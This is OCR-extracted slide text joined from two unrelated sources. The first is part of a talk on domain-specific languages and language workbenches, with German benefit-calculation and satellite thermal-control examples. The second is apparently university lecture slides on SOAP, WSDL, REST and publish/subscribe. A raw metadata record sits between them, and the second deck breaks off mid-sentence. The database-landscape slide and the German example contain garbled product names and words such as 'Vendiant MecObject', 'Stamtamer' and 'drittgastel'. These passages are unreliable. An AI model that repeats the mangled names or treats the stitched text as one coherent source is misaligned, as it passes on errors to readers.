Hulshout\textsuperscript{g}, Steven Kelly\textsuperscript{h}, Alex Loh\textsuperscript{c}, Gabriël Konat\textsuperscript{l}, Pedro J. Molina\textsuperscript{i}, Martin Palatnik\textsuperscript{f}, Risto Pohjonen\textsuperscript{h}, Eugen Schindler\textsuperscript{f}, Klemens Schindler\textsuperscript{f}, Riccardo Solmi\textsuperscript{l}, Vlad Vergu\textsuperscript{l}, Eelco Visser\textsuperscript{l}, Kevin van der Vlist\textsuperscript{k}, Guido Wachsmuth\textsuperscript{l}, Jimi van der Woning\textsuperscript{l} \textsuperscript{a}CWI, The Netherlands \textsuperscript{b}King’s College London, UK \textsuperscript{c}University of Texas at Austin, US \textsuperscript{d}TU Darmstadt, Germany \textsuperscript{e}voelter.de, Stuttgart, Germany \textsuperscript{f}Sioux, Eindhoven, The Netherlands \textsuperscript{g}Delphino Consultancy \textsuperscript{h}MetaCase, Jyväskylä, Finland \textsuperscript{i}TU Delft, The Netherlands \textsuperscript{j}Icistic, Sevilla, Spain \textsuperscript{k}Sogyo, De Bilt, The Netherlands \textsuperscript{l}Young Colfield, Amsterdam, The Netherlands Lessons Learned A Language is not Enough Language Design::More than Lang - Language - Abstractions - Notations - Great IDE - Syntax Coloring - Code Completion - Goto Definition - Analyses - Relevant - Good Errors - Refactorings - Aligned with Processes - Testing - Write Tests - Run them - Report Back - GREAT - Debuggers - Animate Execution - Simulators fun midnight1(a: number, b: number, c: number) = (-b + sqrt(pow2(b) - 4 * a * c)) / (2 * a) fun midnight2(a: number, b: number, c: number) { val bSquared = pow2(b) val sqrtPart = sqrt(bSquared - 4 * a * c) (-b + sqrtPart) / (2 * a) } fun midnight3(a: number, b: number, c: number) { \[-b + \sqrt{b^2 - 4 * a * c} \over 2 * a\] } Feature Models Component Architectures - FourCylEngine - DrivingCommands_in - RoadConditions_in DriveTrainController - EngineStatus_out - SpeedFromEngine_out Gearbox - Gear_out composite block[plusOffset: number, minusOffset: number] plusMinus_Composite_Offset(a: number, b: number) -> (sum, difference) Unterhaltsvorschuss Zeitangabe: laufend Häufigkeit: monatlich einmal Leistungskontext: Leer Leistungsart: Leer Zählaus: uvg Anspruch Beginn: Anfang – Unbegrenzt: junger Mensch.geburtsdatum Anspruch Ende: 01.01.1800 – 31.12.9999 : min(junger Mensch.geburtsdatum + 12 Jahre , datum + 72 Monate – Anzahl Monate mit uvg) Zeitraum für Berechnung: Anfang – Unbegrenzt: {standardzeitraum, standardzeitraum} zweckgebundene Leistung: ☐ dem Grunde nach: ☐ Zeitraumbezogene Daten nullwerte Anzeigen: boolean = 01.01.1800 – 31.05.2016 : true 01.06.2016 – Unbegrenzt : false berechnungsart : berechnungsarttyp = 01.01.1800 – 31.12.9999 : drittgastel Bezugsobjekte: Attribute: bemerkung : string wird validiert antragsdatum : Datum Unterhaltsvorschuss Zeitangabe: laufend Häufigkeit: monatlich einmal Leistungskontext: Leer Leistungsart: Leer Zählart: uvg Anspruch Beginn: Anfang - Unbegrenzt: junger Mensch.geburtsdatum Anspruch Ende: 01.01.1800 - 31.12.9999: min(junger Mensch.geburtsdatum + 12 Jahre, datum + 72 Monate - Anzahl Monate mit uvg) Zeitraum für Berechnung: Anfang - Unbegrenzt: {standardzeitraum, standardzeitraum} zweckgebundene Leistung: ☐ dem Grunde nach: ☐ Zeitraumbezogene Daten nullwerte Anzeigen: boolean = 01.01.1800 - 31.05.2016: true 01.06.2016 - Unbegrenzt: false berechnungsart: berechnungsarttyp = 01.01.1800 - 31.12.9999: dreißigstel Bezugssobjekte: Attribute: bemerkung: string wird validiert antragsdatum: Datum Influences on the Language Language Design::Influences Domain Structure Non Functionals Permissions, IP, Sharing User Skills Model Purpose Analyze, Generate Tool Capabilities Notations, Editing, Scale Software Engineering Practices Get a better tool :-) Language Design::Influences - Domain Structure - Non Functionals: Permissions, IP, Sharing - User Skills - Model Purpose: Analyze, Generate - Tool Capabilities: Notations, Editing, Scale - Software Engineering Practices - Style! - Sep. of Concerns: Different Views - Refactor towards Structure - Get a better tool :-) How to make People precise? Precision \{ Formulas, Rules, Data Structures, Tables, Values \} Performance, Scalability, Robustness, Deployment \{ Programming \} Does this scale? Does the approach scale? If **structure**, **formalization**, and **tool support** don’t scale, then what will?? What are the alternatives? - Excel? - Wikis? - Prose Documents? Do the tools scale? In terms of overall system size? Yes, the system has to be broken down into models of manageable size, as usual. This requires some thought. In terms of team size? Yes, since we rely on established version control systems (git) to deal with groupware aspects; and yes, diff/merge work as expected. In terms of language complexity? Yes, in particular, since you can modularize the language definitions. Can I find the people to do this? Yes, but it is a significant change, so: - it may be a significant education/training effort. - a few people might not get it - a few people may not want to do it. This is a threat! Precision and Formality Different Processes Higher Efficiency - New Skills - Role Change - Job Loss Automation Focus on Engineering Empower Business Ppl - Job Loss - Role Change - Less Importance Some people are afraid of this. Take them seriously. A change of culture that must be managed! Is this the next legacy system? Today’s software is tomorrow’s legacy system. Or is it? Today’s software is tomorrow’s legacy system. Business change is hard Technology change is hard Separation of Concerns Keep BL free of technology Make it „portable“ Existing models become incompatible with new language ⇒ Language Versions Migration Scripts Runtime Tech outdated, uncool or slow ⇒ Keep Lang Technology Keep Models Build new Generator Language Tech outdated, uncool ⇒ Build new Tool Migrate Data Simple, because it well-defined domain semantics and free from „technology stuff“ Today’s software is tomorrow’s legacy system. No, it is not. In conflict with Agile? “MD* and Agile is in Conflict. ” MD* and Agile is in Conflict. Manage like any other intra-project dependency. Evolution of client code is easier than for F/L/P because of migration support! "MD* and Agile is in Conflict." Manage like any other 3rd party dependency: - Development Roadmap - Issue Tracker - Release Notes MD* and Agile is in Conflict. Models and DSLs are an Enabler for Agility: - Integration of Domain Experts - „Living“ Requirements - Decoupled Fachlichkeit & Technik MD* and Agile is in Conflict. Leading LWBs are so productive, you can literally sit with the domain experts and interactively prototype languages (and then clean up later) I’ve looked at the implementation of the language in MPS, but I didn’t find much. Is this all there is? Where’s the magic? [Customer] MD* and Agile is in Conflict. Leading LWBs are so productive, you can literally sit with the domain experts and interactively prototype languages (and then clean up later) I’ve looked at the implementation of the language in MPS, but I didn’t find much. Is this all there is? Where’s the magic? [Customer] Skills? Organizations do not have the necessary skills. True. But... Rockets ???? Further domain-specific extensions to C. Developed by end-user lang engineer. <table> <thead> <tr> <th>User Extensions</th> <th>User-defined Layer</th> </tr> </thead> <tbody> <tr> <td>Languages shipped with mbeddr</td> <td>C99</td> </tr> <tr> <td>Plattform</td> <td>Libraries for web server, node navigation, additional notations, pattern matching, palettes, XML processing, debugging...</td> </tr> <tr> <td>MPS</td> <td>Syntax Highlighting, Code Completion, Goto Definition, Find Usages, Type Checking, Data Flow Analysis, Refactoring, Versioning, Debugging</td> </tr> <tr> <td>Foundation</td> <td>C Compiler &amp; Debugger</td> </tr> <tr> <td></td> <td>PlantUML</td> </tr> <tr> <td></td> <td>Latex</td> </tr> <tr> <td></td> <td>HTML</td> </tr> <tr> <td></td> <td>CBMC</td> </tr> <tr> <td></td> <td>Z3</td> </tr> <tr> <td></td> <td>Sat4J</td> </tr> <tr> <td></td> <td>Implementation</td> </tr> <tr> <td></td> <td>Process</td> </tr> <tr> <td></td> <td>Analysis</td> </tr> </tbody> </table> Infrastructure Specifics in C ```c #include TEMP_BUFFER_SIZE = 10; TACQA = Instance of Temperature Acquisition with mnemonic tail A and the Numeric Id 350 [SENSOR = SensorA] TACQB = Instance of Temperature Acquisition with mnemonic tail B and the Numeric Id 351 [SENSOR = SensorB] Component Temperature Acquisition with Base Mnemonic: TACQ Short Description: acquisition of temperatures Description: The components acquires the measurements of an assigned set of thermistors { Attribute (hidden) int32/rawTemp/[TEMP_BUFFER_SIZE] MEASURED = <no init>; // measured raw values Attribute (hidden) uint32 ACQCTN = 0; // index for filling data acquisition buffer Attribute (readwrite) tempSensor SENSOR (Id=2) = <no init>; // selected sensor for this component Mode Chart TCSACQ (Id=3) initial = OFF { Trigger tcsAcquisition Mode OFF { << ... >> } Mode ON { entry { ACQCTN = 0; } on trigger tcsAcquisition { // measure a value MEASURED[ACQCTN] = readTemperature(SENSOR); ACQCTN = (ACQCTN + 1) % TEMP_BUFFER_SIZE; // calculate average of the @top(TEMP_BUFFER_SIZE) latest measurements and convert to °C TEMP_BUFFER_SIZE - 1 AVTEMP = convert[\sum_{idx = 0}^{\text{TEMP_BUFFER_SIZE} - 1} \frac{MEASURED[idx]}{\text{TEMP_BUFFER_SIZE} \to °C}; } } } Activity startAcquisition with Numeric Id 1 ... { TCSACQ.setMode(ON); } Activity stopAcquisition with Numeric Id 2 ... { TCSACQ.setMode(OFF); } } Component Temperature Acquisition ``` Infrastructure Specifics in C Activity enableTcs with Numeric Id 1 is commandable by TC(150,1) Short Description: enable thermal control Description: The thermal control heats the system if it is too cold. The switching hysteresis can be configured. Constraints: 0: TCSCONTR.inMode(OFF) // switching on is possible only if the TCS is off In-Parameter: int16°C/ upperThreshold: constrained: <no constraint> // upper switching threshold int16°C/ lowerThreshold: constrained: lowerThreshold < upperThreshold // lower switching threshold component<TemperatureAcquisition> acq: constrained: <no constraint> // acquisition component instance to use { REQUEST acq.startAcquisition ( << ... >> ) --> ( << ... >> ) on error do nothing special UPTH = upperThreshold; LOTH = lowerThreshold; DELAY for 10 s TCSCONTR.setMode(ON); TELEMETRY (150,11) Description: Report switching on in a dedicated packet that reports the initial temperature. } Activity disableTcs with Numeric Id 2 is commandable by TC(150,2) Short Description: disable thermal control Description: Constraints: 0: TCSCONTR.inMode(ON) // switching off is possible only if the TCS is on In-Parameter: << ... >> { TCSCONTR.setMode(OFF); REQUEST TACQA.stopAcquisition ( << ... >> ) --> ( << ... >> ) on error do nothing special REQUEST TACQB.stopAcquisition ( << ... >> ) --> ( << ... >> ) on error do nothing special } } Component ThermalControlSystem TCSCONTR thermal control OFF thermal control is inactive TC(150,1) enableTcs TC(150,2) disableTcs ON thermal control is active trigger tcsControl periodically triggered for altering the heater power state according to the measured values exit disable all heaters PUS128 TelemetryService enableTcs TACQ_startAcquisition TM(150,11); queue=10 ProcessTelemetry TCSACQ->ON DELAY 10 s Separation of concerns is key to avoid the legacy trap. **DSLs can isolate business logic completely from technical concerns** **DSLs can help integrate domain experts with communication/review or even coding** **Language Workbenches enable DSLs by reducing effort to build, compose and maintain them** **Migrating to a new LWB is feasible b/c semantics of all models are known, by definition.**
{"Source-Url": "http://www.voelter.de/data/presentations/jax2018-fachlichkeit.pdf", "len_cl100k_base": 6898, "olmocr-version": "0.1.50", "pdf-total-pages": 102, "total-fallback-pages": 0, "total-input-tokens": 127236, "total-output-tokens": 10578, "length": "2e12", "weborganizer": {"__label__adult": 0.00033926963806152344, "__label__art_design": 0.0003185272216796875, "__label__crime_law": 0.00021016597747802737, "__label__education_jobs": 0.0005517005920410156, "__label__entertainment": 5.543231964111328e-05, "__label__fashion_beauty": 0.00011754035949707033, "__label__finance_business": 0.0004544258117675781, "__label__food_dining": 0.00032329559326171875, "__label__games": 0.00040841102600097656, "__label__hardware": 0.0005693435668945312, "__label__health": 0.00024306774139404297, "__label__history": 0.0001373291015625, "__label__home_hobbies": 8.946657180786133e-05, "__label__industrial": 0.0003075599670410156, "__label__literature": 0.00016629695892333984, "__label__politics": 0.0001926422119140625, "__label__religion": 0.0002448558807373047, "__label__science_tech": 0.0026760101318359375, "__label__social_life": 8.32676887512207e-05, "__label__software": 0.004085540771484375, "__label__software_dev": 0.98779296875, "__label__sports_fitness": 0.0002310276031494141, "__label__transportation": 0.00034332275390625, "__label__travel": 0.00015282630920410156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 24957, 0.01752]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 24957, 0.19677]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 24957, 0.66857]], "google_gemma-3-12b-it_contains_pii": [[0, 162, false], [162, 173, null], [173, 478, null], [478, 487, null], [487, 498, null], [498, 639, null], [639, 995, null], [995, 1186, null], [1186, 2404, null], [2404, 2966, null], [2966, 2966, null], [2966, 2976, null], [2976, 3185, null], [3185, 3394, null], [3394, 3750, null], [3750, 3910, null], [3910, 4250, null], [4250, 4257, null], [4257, 4485, null], [4485, 4856, null], [4856, 5970, null], [5970, 6673, null], [6673, 7220, null], [7220, 7232, null], [7232, 7255, null], [7255, 7278, null], [7278, 7491, null], [7491, 7626, null], [7626, 7738, null], [7738, 7746, null], [7746, 7753, null], [7753, 7850, null], [7850, 7981, null], [7981, 8008, null], [8008, 8051, null], [8051, 8098, null], [8098, 8157, null], [8157, 8213, null], [8213, 8223, null], [8223, 9556, null], [9556, 9649, null], [9649, 9794, null], [9794, 9925, null], [9925, 10038, null], [10038, 10239, null], [10239, 10584, null], [10584, 10890, null], [10890, 11183, null], [11183, 11296, null], [11296, 11424, null], [11424, 11678, null], [11678, 11804, null], [11804, 11942, null], [11942, 12031, null], [12031, 12162, null], [12162, 13606, null], [13606, 13622, null], [13622, 13647, null], [13647, 13994, null], [13994, 13994, null], [13994, 14341, null], [14341, 14532, null], [14532, 14660, null], [14660, 15383, null], [15383, 16100, null], [16100, 16127, null], [16127, 16361, null], [16361, 16680, null], [16680, 16708, null], [16708, 16843, null], [16843, 16860, null], [16860, 17039, null], [17039, 17464, null], [17464, 17664, null], [17664, 17682, null], [17682, 17881, null], [17881, 17934, null], [17934, 17976, null], [17976, 18008, null], [18008, 18064, null], [18064, 18230, null], [18230, 18230, null], [18230, 18324, null], [18324, 18418, null], [18418, 18563, null], [18563, 18625, null], [18625, 18649, null], [18649, 18682, null], [18682, 18842, null], [18842, 18973, null], [18973, 19140, null], [19140, 19449, null], [19449, 19758, null], [19758, 19766, null], [19766, 19860, null], [19860, 19873, null], [19873, 19873, null], [19873, 21170, null], [21170, 22679, null], [22679, 24168, null], [24168, 24558, null], [24558, 24957, null]], "google_gemma-3-12b-it_is_public_document": [[0, 162, true], [162, 173, null], [173, 478, null], [478, 487, null], [487, 498, null], [498, 639, null], [639, 995, null], [995, 1186, null], [1186, 2404, null], [2404, 2966, null], [2966, 2966, null], [2966, 2976, null], [2976, 3185, null], [3185, 3394, null], [3394, 3750, null], [3750, 3910, null], [3910, 4250, null], [4250, 4257, null], [4257, 4485, null], [4485, 4856, null], [4856, 5970, null], [5970, 6673, null], [6673, 7220, null], [7220, 7232, null], [7232, 7255, null], [7255, 7278, null], [7278, 7491, null], [7491, 7626, null], [7626, 7738, null], [7738, 7746, null], [7746, 7753, null], [7753, 7850, null], [7850, 7981, null], [7981, 8008, null], [8008, 8051, null], [8051, 8098, null], [8098, 8157, null], [8157, 8213, null], [8213, 8223, null], [8223, 9556, null], [9556, 9649, null], [9649, 9794, null], [9794, 9925, null], [9925, 10038, null], [10038, 10239, null], [10239, 10584, null], [10584, 10890, null], [10890, 11183, null], [11183, 11296, null], [11296, 11424, null], [11424, 11678, null], [11678, 11804, null], [11804, 11942, null], [11942, 12031, null], [12031, 12162, null], [12162, 13606, null], [13606, 13622, null], [13622, 13647, null], [13647, 13994, null], [13994, 13994, null], [13994, 14341, null], [14341, 14532, null], [14532, 14660, null], [14660, 15383, null], [15383, 16100, null], [16100, 16127, null], [16127, 16361, null], [16361, 16680, null], [16680, 16708, null], [16708, 16843, null], [16843, 16860, null], [16860, 17039, null], [17039, 17464, null], [17464, 17664, null], [17664, 17682, null], [17682, 17881, null], [17881, 17934, null], [17934, 17976, null], [17976, 18008, null], [18008, 18064, null], [18064, 18230, null], [18230, 18230, null], [18230, 18324, null], [18324, 18418, null], [18418, 18563, null], [18563, 18625, null], [18625, 18649, null], [18649, 18682, null], [18682, 18842, null], [18842, 18973, null], [18973, 19140, null], [19140, 19449, null], [19449, 19758, null], [19758, 19766, null], [19766, 19860, null], [19860, 19873, null], [19873, 19873, null], [19873, 21170, null], [21170, 22679, null], [22679, 24168, null], [24168, 24558, null], [24558, 24957, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 24957, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 24957, null]], "pdf_page_numbers": [[0, 162, 1], [162, 173, 2], [173, 478, 3], [478, 487, 4], [487, 498, 5], [498, 639, 6], [639, 995, 7], [995, 1186, 8], [1186, 2404, 9], [2404, 2966, 10], [2966, 2966, 11], [2966, 2976, 12], [2976, 3185, 13], [3185, 3394, 14], [3394, 3750, 15], [3750, 3910, 16], [3910, 4250, 17], [4250, 4257, 18], [4257, 4485, 19], [4485, 4856, 20], [4856, 5970, 21], [5970, 6673, 22], [6673, 7220, 23], [7220, 7232, 24], [7232, 7255, 25], [7255, 7278, 26], [7278, 7491, 27], [7491, 7626, 28], [7626, 7738, 29], [7738, 7746, 30], [7746, 7753, 31], [7753, 7850, 32], [7850, 7981, 33], [7981, 8008, 34], [8008, 8051, 35], [8051, 8098, 36], [8098, 8157, 37], [8157, 8213, 38], [8213, 8223, 39], [8223, 9556, 40], [9556, 9649, 41], [9649, 9794, 42], [9794, 9925, 43], [9925, 10038, 44], [10038, 10239, 45], [10239, 10584, 46], [10584, 10890, 47], [10890, 11183, 48], [11183, 11296, 49], [11296, 11424, 50], [11424, 11678, 51], [11678, 11804, 52], [11804, 11942, 53], [11942, 12031, 54], [12031, 12162, 55], [12162, 13606, 56], [13606, 13622, 57], [13622, 13647, 58], [13647, 13994, 59], [13994, 13994, 60], [13994, 14341, 61], [14341, 14532, 62], [14532, 14660, 63], [14660, 15383, 64], [15383, 16100, 65], [16100, 16127, 66], [16127, 16361, 67], [16361, 16680, 68], [16680, 16708, 69], [16708, 16843, 70], [16843, 16860, 71], [16860, 17039, 72], [17039, 17464, 73], [17464, 17664, 74], [17664, 17682, 75], [17682, 17881, 76], [17881, 17934, 77], [17934, 17976, 78], [17976, 18008, 79], [18008, 18064, 80], [18064, 18230, 81], [18230, 18230, 82], [18230, 18324, 83], [18324, 18418, 84], [18418, 18563, 85], [18563, 18625, 86], [18625, 18649, 87], [18649, 18682, 88], [18682, 18842, 89], [18842, 18973, 90], [18973, 19140, 91], [19140, 19449, 92], [19449, 19758, 93], [19758, 19766, 94], [19766, 19860, 95], [19860, 19873, 96], [19873, 19873, 97], [19873, 21170, 98], [21170, 22679, 99], [22679, 24168, 100], [24168, 24558, 101], [24558, 24957, 102]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 24957, 0.03395]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
33b7a28f42d769804da80e74e076ffa8ecd46193
Building Large Scale Information Systems REST Publish/Subscribe PageRank Focus of Different Data Models CAP Theorem Partition Tolerance Consistency Availability RDBMS NoSQL (most) Spring 2013 cs 5301 The evolving database landscape Non-relational Marklogic Vendiant MecObject Progress Objective Operational Analytic Hadoop Piccolo Teradata IBM Netezza ParAccel Kognitio HPC Horton Infobright LucidDB EMC Greenplum Calpoly Actian VectorWise MySQL Vertica NoSQL Graph Enterprise Acuvu Neo4j NOSQL Cassandra HBase Big tables Mongo Redis Couchbase Cloudbase Objectivity Lotus Notes Stamtamer InterSystems Cache Research Relational SAP HANA IBM Informix Oracle Persua IBM DB2 MysqlDB SAP Sybase ASE as-a-Service Salesforce.com Amazon RDS Database.com Postgres Plus Cloud CloudDB Google Cloud SQL New databases NuoDB Vertica NewSQL MemSQL InnoDB SQLFire Drizzle Akkuna Transcend ScaleBase ScaleArc ParElastic Continuing Clustering/Chasking Spring 2013 cs 5301 Background WEB SERVICES What is a Web Service? - Piece of software available over Internet - Uses standardized (i.e., XML) messaging system - More general definition: collection of protocols and standards used for exchanging data between applications or systems Web Service Architecture - Service-Oriented Architecture Architecture II All the technologies are XML based … Open, Standard Technologies - XML – tagging data such that it can be exchanged between applications and platforms - SOAP – messaging protocol for transporting information and instructions between applications (uses XML) Open, Standard Technologies - WSDL – a standard method of describing web services and their specific capabilities (XML) - UDDI – defines XML-based rules for building directories in which companies advertise themselves and their web services SOAP - Simple Object Access Protocol - Format for sending messages over Internet between programs - XML-based - Platform and language independent - Simple and extensible - Stateless, one-way - But applications can create more complex interaction patterns SOAP Building Blocks - Envelope (required) – identifies XML document as SOAP message - Header (optional) – contains header information - Body (required) – call and response information - Fault (optional) – errors that occurred while processing message Simple Example “Get the price of apples” <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope" soap:encodingStyle="http://www.w3.org/2001/12/soap-encoding"> <soap:Body> <m:GetPrice xmlns:m="http://www.w3schools.com/prices"> <m:Item>Apples</m:Item> </m:GetPrice> </soap:Body> </soap:Envelope> Note: GetPrice and Item are application-specific (not part of SOAP) WSDL (Web Service Description Language) - Web services are self-describing - Description is written in WSDL, an XML-based language through which a web service conveys to applications the methods that the service provides and how those methods are accessed - WSDL is meant to be read by applications (not humans) WSDL (Web Service Description Language) • Standard method of describing Web Services and their capabilities • Idea: Automate details involved in applications communication • Operations and messages are described abstractly • Bound to a concrete network protocol and message format to define an endpoint • Provide documentation for distributed systems WSDL Details • A WSDL document defines services • Services are collection of network endpoints (ports) • Abstract definition of endpoints and messages is separated from their concrete network deployment or data format bindings • Allows the reuse of abstract definitions: – messages -abstract descriptions of data being exchanged – port types -abstract collections of operations – concrete protocol and data format specifications for a particular port type constitutes a reusable binding An example ```xml <message name="searchSimple1In"> <part name="program" type="xsd:string"/> <part name="database" type="xsd:string"/> <part name="query" type="xsd:string"/> </message> <message name="searchSimple1Out"> <part name="Result" type="xsd:string"/> </message> ``` Example (continued) ```xml <portType name="Blast"> <operation name="searchSimple" parameterOrder="program database query"> <documentation>Execute Blast</documentation> <input name="searchSimple1In" message="tns:searchSimple1In"/> <output name="searchSimple1Out" message="tns:searchSimple1Out"/> </operation> ....[other operations] </portType> ``` Summary • WSDL document lists functions supported by each web service, inputs and outputs • To actually call a web service, need interface or tools: – SOAP:lite (Perl) – Apache Axis (Java) – Many others... UDDI • UDDI defines an XML-based format that describes electronic capabilities and business processes • Entries are stored in a UDDI registry • UDDI Business Registry (UBR) – "white pages" – contact info, description – "yellow pages" – classification info, details – "green pages" – technical data – uddi.microsoft.com REST Representational State Transfer Applications on The Web • In the usual (non-REST) approach we can use the web for applying RPCs • Dynamic pages are the result of applying remote applications • It is possible to specify the application and the parameters in the GET request or send them in a POST request Web Services • When calling a remote web service: – The client sends the method name and the parameters inside an envelope – i.e., wrapped in XML, in the body of a POST request – Receives the result wrapped in an XML envelope – Uses SOAP REST • A design pattern for implementing network systems • Provides a set of design principles Resource • The web is a collection of resources • A resource has a – URI – Content • A resource can be represented in different ways • A response provides a representation of a resource • Can we compare two resources by comparing their content? Different Representations of a Resource • Consider an HTML page cs5301.html and the following files: – The compression of cs5301.html – The results of “fixing” cs5301.html to conform to the XHTML standard – The presentation of cs5301.html using different CSS stylesheets – The file cs5301.html in different character encodings – The file cs5301.html in different languages • Which of the above is the same resource as cs5301.html? Client Interaction - The client references a web resource using a URL - A representation of the resource is returned - The representation places the client in a new state - When the client selects a hyperlink it accesses another resource - The new representation places the client application into yet another state - Thus, the client application transfers state with each resource representation Representational State Transfer "Representational State Transfer is intended to evoke an image of how a well-designed Web application behaves: a network of web pages (a virtual state-machine), where the user progresses through an application by selecting links (state transitions), resulting in the next page (representing the next state of the application) being transferred to the user and rendered for their use." - Roy Fielding Services • In REST, there is a resource for every service • There is a URL for every resource • So, how do we call a service? Application Invocation RESTful http://university.edu/students/55456 non-RESTful http://university.edu/getStudent?id=55456 List of Students RESTful http://university.edu/students/ ```xml <?xml version="1.0"?> <Students> <Student id="55345" href="http://www.university.edu/students/55345"/> <Student id="55346" href="http://www.university.edu/students/55346"/> <Student id="55347" href="http://www.university.edu/students/55347"/> <Student id="55348" href="http://www.university.edu/students/55348"/> </Students> ``` To return a list of resources, it provides a list of URIs Too Many Addresses? - Q: If we have 100,000 students, does this mean we need 100,000 web pages? And what if we will want to represent 100 grades for each student? - A: We just need the method to generate/retrieve the representation of the resource upon request Operations • All interactions between a client and a web service are done with simple HTTP operations: – Retrieve information (HTTP GET) – Create information (HTTP PUT) – Update information (HTTP POST) – Delete information (HTTP DELETE) Requirements • Architecture in REST is required to provide – Separation between clients and servers – Stateless protocol – The ability to cache responses – Mediators between clients and servers (e.g., proxies, gateways) should be transparent to users Benefits of the RESTful Approach • What are the benefits of using the REST architecture? • Easier caching: – For example, are the following two URIs represent http://university.edu/getGrade?student=111&course=333 vs. http://university.edu/getGrade?course=333&student=111 http://university.edu/students/111/course/333/grade Going back and forth is simply moving from one state to another • What happens in a web shopping application when – You put items in the shopping cart – Leave the cart untouched (and the browser’s window, as well) for a week – Tries to continue the purchase • Is it possible to add as a bookmark a shopping “state”? Benefits of the RESTful Approach • When a request is sent to an application, on the way to the application, only the headers of HTTP requests are being examined – thus, in REST it is easier to enforce an **access control policy** or distinguish between different requests • For example, if it is forbidden to access some resources that appear in a blacklist, it is easy to enforce that when the resources are specified in the head of the message (the URL in a RESTful approach) and difficult if they are in the body (a SOAP message) For More Information Publish/Subscribe Outline • Introduction to Publish/Subscribe Paradigm • Common Denominators of Pub/Sub Schemes • How Pub/Sub compares to “Traditional” Interaction Schemes • Variants of Pub/Sub Schemes • Design and Implementation Why Publish/Subscribe? - A Distributed System - thousands of entities-distributed all over the world-whose location and behavior greatly vary - There is a demand for a more flexible communication system that reflects the dynamic and decoupled nature of the applications described above Publish/Subscribe Basics - Subscribers - have the ability to express their interest in or subscribe to an event or a pattern of events - Publishers – can publish or advertise events - Event Notification Service – provides storage and management for subscriptions and efficient delivery of events Event Notification Service acts as a neutral trusted mediator between publishers and subscribers Naïve Approach - Each subscriber will act as a server, listening to notifications - Each publisher will send notifications to all the clients - What is the problem? - Why is this approach different from the publish/subscribe architecture? Outline • Introduction to Publish/Subscribe Paradigm • Common Denominators of Pub/Sub Schemes • How Pub/Sub compares to “Traditional” Interaction Schemes • Variants of Pub/Sub Schemes • Design and Implementation Space Decoupling • The interacting parties (publishers and subscribers) do not need to know each other • Both parties go through the Event Service for all interactions Time Decoupling • The interacting parties do not need to be actively participating in the interaction at the same time Synchronization Decoupling • Publishers are not blocked while producing events • Subscribers can get asynchronous notifications of occurrences of events while performing concurrent tasks • Production and consumption of events does not happen in main flow of control, so interaction does not have to be synchronized Synchronization Decoupling Outline • Introduction to Publish/Subscribe Paradigm • Common Denominators of Pub/Sub Schemes • How Pub/Sub compares to “Traditional” Interaction Schemes • Variants of Pub/Sub Schemes • Design and Implementation Alternative Communication Paradigms - The ‘Cousins’: - Message Passing - Remote Procedure Call (RPC) - Shared Spaces - Message Queuing Message Passing - Viewed as ancestor of distributed interactions - Participants communicate by sending and receiving messages asynchronously through a network channel - Similar to Pub/Sub, but Producer and Consumer are coupled in time and space Message Passing - Asynchronous for producer but not consumer - Channel set up ahead of time, producer and consumer are active at same time - Recipient of message known to sender Remote Procedure Call (RPC) - One of the most widely used forms of distributed interaction - Remote interactions appear the same as local interactions, make distributed programming easy - Each request is followed by a response Remote Procedure Call (RPC) - Strong time and synchronization (on the consumer side) coupling - Coupled in space - an invoking object holds a remote reference to each of its invokes Attempts to remove synchronization in RPC **Asynchronous RPC** - Decouples synchronization by making the producer not expect a reply **Future RPC** - Decouples synchronization by not blocking the producer, they can access the reply later when it becomes available Shared Spaces - JavaSpaces, Tspaces, and Linda - Distributed shared memory, common to all participants who interact by reading and writing to it - Many-to-many anonymous interaction – time and space decoupling - Consumers not asynchronously notified of messages, but retrieve messages with a synchronous request Message Queuing - Messages are persistently stored within queues - All communications filtered by the queue – similar to the Notification Service in Pub/Sub - Consumers must explicitly pull messages from the queue – No synchronization decoupling on consumer side Decoupling Abilities of Interaction Paradigms <table> <thead> <tr> <th>Abstraction</th> <th>Space decoupling</th> <th>Time decoupling</th> <th>Synchronization decoupling</th> </tr> </thead> <tbody> <tr> <td>Message Passing</td> <td>No</td> <td>No</td> <td>Producer-side</td> </tr> <tr> <td>RPC/RMI</td> <td>No</td> <td>No</td> <td>Producer-side</td> </tr> <tr> <td>Asynchronous RPC/RMI</td> <td>No</td> <td>No</td> <td>Yes</td> </tr> <tr> <td>Future RPC/RMI</td> <td>No</td> <td>No</td> <td>Yes</td> </tr> <tr> <td>Tuple Spaces</td> <td>Yes</td> <td>Yes</td> <td>Producer-side</td> </tr> <tr> <td>Message queuing</td> <td>Yes</td> <td>Yes</td> <td>Producer-side</td> </tr> <tr> <td><strong>Pub/Sub</strong></td> <td><strong>Yes</strong></td> <td><strong>Yes</strong></td> <td><strong>Yes</strong></td> </tr> </tbody> </table> Publish/Subscribe ![Diagram](image) Outline - Introduction to Publish/Subscribe Paradigm - Common Denominators of Pub/Sub Schemes - How Pub/Sub compares to “Traditional” Interaction Schemes - Variants of Pub/Sub Schemes - Design and Implementation Topic-Based Publish/Subscribe - Earliest pub/sub scheme based on notion of topics or subjects - Topics similar to notion of groups - Subscribing to a topic $T$ can be viewed as becoming a member of a group $T$, and publishing an event on 